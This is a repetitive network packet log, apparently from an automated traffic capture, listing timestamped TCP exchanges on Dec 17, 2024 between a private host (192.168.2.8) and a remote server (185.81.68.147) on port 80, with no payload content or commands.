                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.241147995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.241972923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.242147923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.242252111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.243058920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.243235111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.243335009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.243911028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.243987083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.244090080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.244853020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.244963884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.245064020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.245853901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.246002913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.246104002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.246727943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.246773005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.246867895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.247731924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.247848988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.247947931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.248666048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.248687983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.248805046 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.249946117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.250219107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.250324965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.251072884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.251152992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.251251936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.251744986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.251825094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.251924992 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.252463102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.252533913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.252630949 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.253371000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.253509045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.253604889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.254298925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.254419088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.254513025 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.255254984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.436841965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.436939001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.437575102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.437666893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.437772036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.438571930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.438630104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.438734055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.439510107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.439876080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.439975977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.440464020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.440546989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.440646887 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.441423893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.441665888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.441761971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.442337036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.442486048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.442593098 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.443264008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.443412066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.443507910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.444277048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.444400072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.444495916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.445187092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.445316076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.445410013 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.446149111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.446281910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.446381092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.447129965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.447227955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.447324038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.448077917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.448177099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.448283911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.448997021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.449071884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.449177027 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.449960947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.450122118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.450222969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.450939894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.451061964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.451165915 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.451891899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.452017069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.452117920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.452929020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.453008890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.453105927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.453855038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.453927040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.454024076 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.454715014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.454860926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.454957008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.455791950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.455925941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.456023932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.456701040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.504112959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.599277020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.599390030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.599473953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.599714994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.599845886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.599929094 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.600651026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.600739956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.600825071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.601619005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.601712942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.601794958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.602546930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.602653980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.602732897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.603507042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.603610992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.603683949 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.604423046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.604507923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.604588985 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.605442047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.605545998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.605618000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.606364012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.606424093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.606501102 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.607302904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.607413054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.607489109 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.608254910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.608436108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.608511925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.609194994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.791906118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.792031050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.792109966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.792809963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.792934895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.793010950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.793761969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.793905973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.793981075 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.794717073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.794826984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.794905901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.795691013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.795845032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.795932055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.796643019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.796768904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.796853065 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.797602892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.797702074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.797780037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.798510075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.798643112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.798726082 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.799493074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.799616098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.799695969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.800437927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.800568104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.800649881 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.801362038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.801531076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.801616907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.802335024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.802428007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.802510977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.803292036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.803396940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.803478956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.804354906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.804378033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.804471970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.805186987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.805393934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.805470943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.806140900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.806325912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.806410074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.807089090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.807252884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.807334900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.808060884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.808180094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.808269978 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.809027910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.809156895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.809242010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.809978962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.810066938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.810146093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.810904980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.811034918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.811114073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.811876059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.812005997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.812079906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.812810898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.812944889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.813023090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.813772917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.813816071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.813900948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.814732075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.814812899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.814898968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.815680981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.815804958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.815887928 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.816622019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.816744089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.816828966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.817594051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.817713976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.817796946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.818568945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.818701982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.818782091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.819533110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.819616079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.819695950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.820476055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.820549965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.820632935 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.821417093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.821542025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.821623087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.822334051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.822446108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.004791975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.004877090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.005510092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.005625010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.005713940 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.006475925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.006578922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.006707907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.007437944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.007520914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.007636070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.008402109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.008506060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.008584023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.009308100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.009496927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.009665966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.010257959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.010340929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.010418892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.011214972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.011390924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.011480093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.012166977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.012295008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.012384892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.013118982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.013230085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.013334990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.014051914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.014152050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.014256954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.015059948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.015185118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.015325069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.015980005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.016100883 CET8049709185.81.68.147192.168.2.8
